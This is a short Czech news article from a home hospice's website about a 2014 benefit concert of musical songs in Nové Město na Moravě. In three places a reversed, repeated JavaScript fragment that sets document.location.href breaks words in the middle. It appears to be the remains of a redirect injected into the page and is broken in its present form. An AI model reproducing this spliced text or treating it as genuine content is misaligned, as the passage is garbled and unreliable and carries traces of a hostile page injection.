Domácí hospic Vysočina
Rainbow page separator

Domácí hospic Vysočina podpoří muzikálové písně

Čtvrtek, 30. října 2014

IKAROS - DOMÁCÍ HOSPIC VYSOČINA

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Podzimní benefiční koncert s podtitulem Večer plný muzikálu Domácího hospicu Vysočina se uskuteční v sobotu 8. lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topadu od 19 hodin v novoměstském kulturním domě. „Jde o v pořadí již pátý koncert, který pro nás soubor Ikaros odehraje, a věřím, že bude stejně úspěšný, jako všechny předchozí,“ informoval ředitel obecně prospěšné společnosti Domácí hospic Vysočina v Novém Městě na Marie Petr Havlíček.
Účinkující z Divadla Ikaros, kteří v novoměstském kulturním domě vys[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupí, zazpívají písně z muzikálů Chicago, Pokrevní bratři, Pomáda a Bídníci.
Vstupenky na benefiční představení uváděného na podporu Domácího hospice Vysočina je možné zakoupit buď přímo na místě v pokladně kulturního domu, anebo v předprodeji v informačním centru na Vratislavově náměstí či v sídle hospice ve Žďárské ulici.